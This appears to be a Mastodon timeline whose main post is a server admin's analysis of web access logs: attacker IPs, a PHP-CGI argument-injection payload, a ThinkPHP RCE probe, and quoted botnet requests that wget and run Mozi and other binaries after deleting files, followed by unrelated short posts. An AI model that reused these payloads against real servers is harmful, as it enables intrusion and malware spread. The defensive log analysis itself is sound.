León Castillejos @L1Cafe@social.privacytools.io

Did not clear my access log for some time, amassing over 300MBs.

What I looked at

Common attack patterns (SQLi, BOF, path traversal etc.)
Common attack URLs (e.g. https://github.com/danielmiessler/SecLists/)
Bad and unusual HTTP status codes
POST requests against unusual places (no inbox, push)

Findings

One IP tries to actively enumerate Fedi accounts: 75.64.236[.]168
241 IPs tried to blindly exploit non-fedi-specific services, e.g. SQL injects, posting shells
53 IPs did enumeration only, looking exploitable services and shells
Most popular was checking for Wordpress, phpMyAdmin and looking for existing shells
The crawler from fediverse[.]space seems okay, but if you want to block: 64.227.114[.]249

Details

Top attackers

211.21.226[.]123 Taiwan 122.14.213[.]79 China 113.53.230[.]34 Thailand 150.109.78[.]53 Singapore 118.25.38[.]1 China 118.25.111[.]38 China 106.12.40[.]125 China 103.45.99[.]20 China 47.199.217[.]59 US

The longest attack URL, used by many Chinese attackers

"POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1"

This URL decodes to:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

I’d rather not Think PHP, thanks

"GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1"

Ask and thou shalt receive. 16 attackers asked for a shell.

GET /shell.php HTTP/1.1

Kinda cute

"GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.137.154[.]33/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1" 404 146 "-" "Hello, world" "-" "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.13.206[.]99:34286/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets[.]net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1"

Top unusal request lines

24 "https[:]//volcable.ru/" 21 "https[:]//jyvopys.com/" 18 "https[:]//vulkan-platinym24.ru/" 18 "https[:]//sexjk.com/" 18 "https[:]//glassdeskguide.com/" 18 "https[:]//dezgorkontrol.ru/" 18 "https[:]//brendof-club.com/" 18 "https[:]//arabic-poetry.com/" 18 "http[:]//hacron.ru/" 15 "https[:]//se.painting-planet.com/" 15 "https[:]//landofgames.ru/"

#fediadmin #mastoadmin

@amolith you can make your CI catching some of them:

https://git.shivering-isles.com/shivering-isles/blog/-/blob/deploy/.gitlab-ci.yml#L10

Always a good thing to throw an analyzer at your stuff before publishing

Jitsi Meet features update, April 2020 https://jitsi.org/news/features-update-april-2020/

@L1Cafe protip:
<enter>~.
forces immediate disconnect in openssh

Hello Fedi.

Do you like Computer Science? Cybersecurity? Math?

Do you use Telegram?

Would you like to join a Telegram channel with absolutely zero ads, and tons of content related to these fields? Yes?

Click the link! https://t.me/x000_channel

Zoom's encryption has some major flaws, is "not suited for secrets", and Zoom has servers in China generating meeting encryption keys for users in other countries, Citizen Lab researchers discover https://theintercept.com/2020/04/03/zooms-encryption-is-not-suited-for-secrets-and-has-surprising-links-to-china-researchers-discover/ (by me)